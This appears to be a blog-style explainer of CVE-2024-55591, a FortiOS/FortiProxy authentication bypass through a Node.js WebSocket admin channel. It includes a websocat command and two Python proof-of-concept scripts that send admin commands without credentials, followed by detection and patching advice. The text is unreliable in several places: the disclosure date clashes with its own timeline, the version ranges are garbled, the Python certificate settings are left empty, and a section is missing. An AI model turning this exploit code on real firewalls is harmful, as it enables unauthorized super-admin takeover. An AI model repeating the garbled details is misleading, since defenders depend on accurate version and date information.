CVE-2024-55591 - Authentication Bypass in FortiOS and FortiProxy via Node.js WebSocket
On June 2024, a severe vulnerability was disclosed in Fortinet’s FortiOS and FortiProxy products, identified as CVE-2024-55591. The flaw enables remote attackers to escalate privileges and gain *super-admin* access without proper authentication, by exploiting a weakness in the way the system handles WebSocket connections through a Node.js backend. Let's break down what this means, why it matters, and how you can test and protect your environment.
1. What is CVE-2024-55591?
CVE-2024-55591 is classified as an *Authentication Bypass Using an Alternate Path or Channel* (CWE-288). In simple terms, it allows an attacker to access admin functionality by circumventing the normal login mechanisms.
FortiProxy: 7.. through 7..19 and 7.2. through 7.2.12
> NOTE: If you are running any of these versions, you are at risk.
2. How does the Exploit work?
The vulnerability stems from the use of a Node.js WebSocket module that doesn’t properly validate authentication tokens or session states for admin channels. Normally, admin actions require authenticated requests. However, due to this flaw, an attacker can craft WebSocket requests that either entirely lack authentication tokens or use alternate, malformed paths, and still get *super-admin* access.
The attacker does not need valid credentials.
- They send a crafted WebSocket connection request directly to the Node.js backend, using an alternate URL path or channel.
- If the request matches certain conditions, FortiOS/FortiProxy grants super-admin permissions, believing the connection is legitimate.
3. Step-by-Step Exploit Scenario
Here's a simple walk-through of how an attacker might leverage this vulnerability.
a. Find the WebSocket Admin Endpoint
Most installations expose an administrative WebSocket endpoint, e.g.:
wss://<firewall-IP>:10443/api/ws
b. Craft a Malicious WebSocket Request
The attacker creates a WebSocket session using the ws Python package or websocat utility. They avoid standard authentication or use a modified path:
For example — using websocat
websocat "wss://target-ip:10443/api/ws/alternate-admin"
Or in Python (using websocket-client)
import websocket
url = "wss://target-ip:10443/api/ws/alternate-admin"
ws = websocket.WebSocket()
ws.connect(url,
sslopt={"cert_reqs": }, # Ignore cert for demo
header={
# No auth header!
})
# Send an admin command, e.g., list users
ws.send("{\"action\":\"list_users\"}")
print(ws.recv())
ws.close()
c. Receive Super-Admin Response
If unpatched, the system responds with full admin information, letting the attacker manage users, view configs, or even reset passwords.
4. Indicators of Compromise
If you see unexpected WebSocket connections or admin actions in your audit logs with missing session or auth headers, it may indicate exploitation.
Restrict admin interfaces. Allow access only from trusted networks.
- Monitor logs. Look for suspicious WebSocket connections, especially those without authentication headers.
---
Fortinet Security Advisory
- Fortinet Official PSIRT Advisory (FG-IR-24-55591)
6. Proof-of-Concept (PoC) Code
Below is a simple example in Python that demonstrates a handshake without authentication to the vulnerable admin WebSocket:
import websocket
target = "wss://your.fortigate.ip:10443/api/ws/alternate-path"
ws = websocket.WebSocket()
ws.connect(target, sslopt={"cert_reqs": })
# Attempt a disallowed admin action
command = '{"action": "get_system_status"}'
ws.send(command)
print(ws.recv())
ws.close()
> DISCLAIMER: Only test on systems you own or have explicit permission to test.
7. References
- NVD - CVE-2024-55591
- CWE-288: Improper Authentication
- Fortinet Official Security Advisory
8. Conclusion
CVE-2024-55591 is a dangerous authentication bypass impacting many Fortinet firewalls and proxies. Admins should patch *immediately*, restrict admin WebSocket access, and check logs for traces of possible exploitation. As a rule: never expose admin interfaces to the open internet and keep your firmware up to date.
Timeline
Published on: 01/14/2025 14:15:34 UTC
Last modified on: 01/15/2025 20:48:30 UTC